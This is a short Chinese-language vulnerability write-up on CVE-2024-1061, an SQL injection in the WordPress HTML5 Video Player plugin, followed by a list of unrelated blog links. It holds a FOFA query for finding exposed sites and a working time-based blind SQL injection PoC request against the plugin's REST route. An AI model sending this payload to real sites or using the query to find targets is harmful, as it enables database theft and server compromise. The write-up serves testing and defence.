WordPress Plugin HTML5 Video Player SQL注入漏洞复现(CVE-2024-1061)

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin HTML5 Video Player 插件 get_view 函数中 id 参数存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

HTML5 Video Player < 2.5.25

0x04 复现环境

FOFA:"wordpress" && body="html5-video-player"

0x05 漏洞复现

PoC

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: clos

最近更新

  1. TCP协议是安全的吗?

    2024-02-04 23:10:01       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-02-04 23:10:01       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-02-04 23:10:01       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-02-04 23:10:01       20 阅读

热门阅读

  1. Docker 第八章 : Docker 容器端口映射

    2024-02-04 23:10:01       28 阅读
  2. k8s网络详解(一)

    2024-02-04 23:10:01       22 阅读
  3. SQL语句创建数据库

    2024-02-04 23:10:01       34 阅读
  4. 开源软件的影响力

    2024-02-04 23:10:01       37 阅读
  5. UVA-213

    2024-02-04 23:10:01       31 阅读
  6. QCoro: Qt C++ 20 协程库介绍

    2024-02-04 23:10:01       33 阅读
  7. element-ui上传图片组件封装

    2024-02-04 23:10:01       27 阅读
  8. 【如何快速上手Vue.js框架——详细介绍】

    2024-02-04 23:10:01       30 阅读
  9. 【从零开始学设计模式】第三章_工厂模式

    2024-02-04 23:10:01       33 阅读
  10. Spring- FactoryBean接口中的getObject()方法

    2024-02-04 23:10:01       33 阅读
  11. C#学习(十二)——Linq

    2024-02-04 23:10:01       30 阅读
  12. 记录一下怎么重装服务器

    2024-02-04 23:10:01       32 阅读
  13. Qt应用软件【数据篇】大小端数据转换

    2024-02-04 23:10:01       32 阅读